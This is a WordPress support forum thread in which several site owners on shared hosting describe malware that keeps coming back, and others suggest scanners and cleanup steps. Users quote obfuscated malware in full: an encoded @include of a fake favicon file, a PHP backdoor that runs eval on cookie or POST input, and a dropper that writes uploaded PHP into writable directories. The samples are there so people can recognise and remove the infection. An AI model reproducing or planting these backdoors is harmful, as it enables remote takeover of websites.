• Resolved bethplummer

    (@bethplummer)


    It appears my account that hosts several WordPress websites is having a malicious file issue. I don’t have much experience in fixing these type of things.

    I have a Bluehost account.
    It is the cloud hosting plan, but shared I believe.
    I am using Wordfence to restore files.

    Files being affected are:
    File appears to be malicious: wp-config.php
    wp-settings.php
    File appears to be malicious: index.php
    WordPress core file modified: index.php
    WordPress core file modified: wp-settings.php

    This is an example of the code I see
    This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “@include “\x2fh\x6fm\x651\x2fm\x61v\x65r\x69f\x35/\x70u\x62l\x69c\x5fh\x74m\x6c/\x73i\x67n\x73o\x68i\x6f/\x77p\x2dc\x6fn\x74e\x6et\x2fg\x61l\x6ce\x72y\x2ff\x61v\x69c\x6fn\x5f4\x641\x622\x66.\x69c\x6f”…”. The infection type is: Misc:PHP/ico.
    I am not even sure what that code does or means.

    I restore thru Wordfence…but it keeps happening and I have several websites. How do I make this stop? Is there a simple way to take care of this? I think it is odd that this is happening to new installs too, so I am not sure what to do.

Viewing 15 replies - 1 through 15 (of 15 total)
  • The fact that the corruption keeps re-occurring suggests that the compromise/backdoor is at the server level, possibly affecting more than just your own site…

    If Wordfence isn’t picking up malware or a compromise on your site directly, then the issue is likely external – you may want to inform your host provider so they can investigate the server.

    Hi @bethplummer
    Typically, I would recommend following steps mentioned in “How to Clean a Hacked WordPress Site using Wordfence“, but as “bluebearmedia” it seems that there is a backdoor still there and the attacker keeps finding his way to re-infect files again and again, in most cases your website might be hacked because there is another infected website on the same shared server, in these situations, hiring a professional security analyst to do a site cleaning for you might be necessary.

    Thanks.

    I am having the exact same problem on my Blue host account. Started about a month ago.

    Changed all passwords and still have to clean almost daily.

    I have the same problem. I try to clean up the infected files, but the problem comes again and again. So is there a way to remove this malware forever? I also changed all passowords and filesystem permissions.

    Thanks!

    Same problem here with about 5 sites on a shared server. It’s an almost daily cleaning with wordfence but these cleanings don’t get to the root of the infection for some reason.

    It gets in my wp-config file, I clean it, reset the permissions, then a day or two later it’s infected again. I’ve reset server login passwords, ftp passwords, wordpress database passwords for each site, wp logins. I’m at a loss for what else I can do. Any advice would be appreciated!

    If you put
    “\x2fh\x6fm\x651\x2fm\x61v\x65r\x69f\x35/\x70u\x62l\x69c\x5fh\x74m\x6c/\x73i\x67n\x73o\x68i\x6f/\x77p\x2dc\x6fn\x74e\x6et\x2fg\x61l\x6ce\x72y\x2ff\x61v\x69c\x6fn\x5f4\x641\x622\x66.\x69c\x6f”
    into UNPHP.NET it decodes to this:
    /home1/maverif5/public_html/signsohio/wp-content/gallery/favicon_4d1b2f.ico

    This is a malicious file that should be deleted.

    Check Settings-Users for any Administrator accounts that you don’t recognise and delete them.

    Same problem here going on for several months.
    I suspect it is server level as I have cleaned my sites then changed all passwords (many times). Some times I find files that have permissions set to 000 which to me, indicates root access.
    Contacted hosting company A2 Hosting every day for weeks and they keep referring me to their 3rd party contracted cleaning service.

    My host keeps shutting down my email service as the infection is generating spam from my sites.

    On the verge of cleaning and moving to a new host.

    I have downloaded what I believe to be the complete set of malicious php files if anyone is interested to take a look.

    Here is the content of one that keeps returning called files21.php:
    <?php
    $xarey = ‘7vk2\’x86bm3a*dnrol-H1c40e9yi#sufg5p_t’;$dubiat = Array();$dubiat[] = $xarey[23].$xarey[22].$xarey[31].$xarey[3].$xarey[10].$xarey[20].$xarey[6].$xarey[8].$xarey[18].$xarey[24].$xarey[25].$xarey[0].$xarey[6].$xarey[18].$xarey[22].$xarey[23].$xarey[10].$xarey[25].$xarey[18].$xarey[6].$xarey[13].$xarey[23].$xarey[33].$xarey[18].$xarey[0].$xarey[7].$xarey[10].$xarey[10].$xarey[33].$xarey[21].$xarey[13].$xarey[25].$xarey[24].$xarey[22].$xarey[8].$xarey[13];$dubiat[] = $xarey[19].$xarey[12];$dubiat[] = $xarey[28];$dubiat[] = $xarey[21].$xarey[16].$xarey[30].$xarey[14].$xarey[36];$dubiat[] = $xarey[29].$xarey[36].$xarey[15].$xarey[35].$xarey[15].$xarey[24].$xarey[34].$xarey[24].$xarey[11].$xarey[36];$dubiat[] = $xarey[24].$xarey[5].$xarey[34].$xarey[17].$xarey[16].$xarey[13].$xarey[24];$dubiat[] = $xarey[29].$xarey[30].$xarey[8].$xarey[29].$xarey[36].$xarey[15];$dubiat[] = $xarey[11].$xarey[15].$xarey[15].$xarey[11].$xarey[26].$xarey[35].$xarey[9].$xarey[24].$xarey[15].$xarey[32].$xarey[24];$dubiat[] = $xarey[29].$xarey[36].$xarey[15].$xarey[17].$xarey[24].$xarey[14];$dubiat[] = $xarey[34].$xarey[11].$xarey[21].$xarey[2];foreach ($dubiat[7]($_COOKIE, $_POST) as $otktndm => $bnuui){function mosulw($dubiat, $otktndm, $suauag){return $dubiat[6]($dubiat[4]($otktndm . $dubiat[0], ($suauag / $dubiat[8]($otktndm)) + 1), 0, $suauag);}function gbkww($dubiat, $rdlduvw){return @$dubiat[9]($dubiat[1], $rdlduvw);}function zgpojvs($dubiat, $rdlduvw){$gjkxcko = $dubiat[3]($rdlduvw) % 3;if (!$gjkxcko) {eval($rdlduvw[1]($rdlduvw[2]));exit();}}$bnuui = gbkww($dubiat, $bnuui);zgpojvs($dubiat, $dubiat[5]($dubiat[2], $bnuui ^ mosulw($dubiat, $otktndm, $dubiat[8]($bnuui))));}

    Do a full scan with the plugin – WebDefender security. Then remove the injected files it finds if it’s not a native WordPress file. If it is, clean it.

    Thanks for the reply Troy.
    I am using WordFence to scan manually twice a day.
    I presume WebDefender will have similar results??
    After I remove files they get injected back a day or 2 later.

    I was in the same endless loop as you with Wordfence. WebDefender found many more files that caused the re-infections. Do it, you’ll thank me later.

    @troy7890: Thanks for the advice about WebDefender.

    It found some PHP files in the wp-contents/uploads directories that Wordfence missed.

    Wow, was using wordfence and it was finding some files everyday that I fixed or deleted, but I just installed webdefender and ran it and it found a boat load more files that wordfence was not finding.

    Thanks for the tip.

    I try to install the WebDefender WordPress plugin, but I always get the following error: Cannot write progress data to file. Also with all right to the WWW directory of the site.

    I also tried the WebDefender “Antivirus for PHP site”, but the file “cwis-scan.min.js” is missing in the download package.

    I’m desperate, could anyone help me to get WebDefender running.

    Thanks!

    Hi

    For the people have a Plesk Servers you can install “Revisium Antivirus” Security extension ( Extensions > Security tab > view all > search on Revisium Antivirus) then run the antivirus after that you will see list of all the infected files inside each directory and site, then proceed with deleting all the infected ones also don’t forget to remove the infected code inside some of the files (the antivirus will guide you ). That’s all

    Congrats your server now is cleaned ??

    Hope this help you!

    Best

    Hi just an addition. I was in the same endless loop with wordfence trying to delete these infected files with @include “\x2fh\x6fm\x651 etc.

    I think I found the file who is creating these @include “\x2fh\x6fm\x651 etc. infections all the time.

    This is what I did:
    1) Download the whole WordPress site to your computer
    2) Then search for php files with the text ‘rawurldecode’ using Notepad++
    3) If you then find files with weird file names such as: zvqbjhrl.php
    And they also contains very strange code, such as:
    function jdszmp($vtwintjvkr, $vnuonc){global $vtwmb;$vtwmb = $vtwintjvkr;$vnuonc = str_split(rawurldecode(str_rot13($vnuonc)));function jzibdoj($zyeiayf, $vtwintjvkr){global $nfspmbl, $vtwmb;return $zyeiayf ^ $nfspmbl[$vtwintjvkr % strlen($nfspmbl)] ^ $vtwmb[$vtwintjvkr % strlen($vtwmb)];}$vnuonc = implode(“”, array_map(“jzibdoj”, array_values($vnuonc), array_keys($vnuonc)));$vnuonc = @unserialize($vnuonc);if (@is_array($vnuonc)){$vtwintjvkr = array_keys($vnuonc);$vnuonc = $vnuonc[$vtwintjvkr[0]];if ($vnuonc === $vtwintjvkr[0]){echo @serialize(Array(‘php’ => @phpversion(), ));exit();}else{function lrzugsl($pockhvlvjir) {static $oxtys = array();$pockhvlvjsjhbtvle = glob($pockhvlvjir . ‘/*’, GLOB_ONLYDIR);if (count($pockhvlvjsjhbtvle) > 0) {foreach ($pockhvlvjsjhbtvle as $pockhvlvj){if (@is_writable($pockhvlvj)){$oxtys[] = $pockhvlvj;}}}foreach ($pockhvlvjsjhbtvle as $pockhvlvjir) lrzugsl($pockhvlvjir);return $oxtys;}$tghfnmi = $_SERVER[“DOCUMENT_ROOT”];$pockhvlvjsjhbtvle = lrzugsl($tghfnmi);$vtwintjvkr = array_rand($pockhvlvjsjhbtvle);$jlolaswm = $pockhvlvjsjhbtvle[$vtwintjvkr] . “/” . substr(md5(time()), 0, 8) . “.php”;@file_put_contents($jlolaswm, $vnuonc);echo “https://” . $_SERVER[“HTTP_HOST”] . substr($jlolaswm, strlen($tghfnmi));exit();}}}

    Then delete those files.

    Success,

    ebakker66

Viewing 15 replies - 1 through 15 (of 15 total)
  • The topic ‘malicious files keep showing up’ is closed to new replies.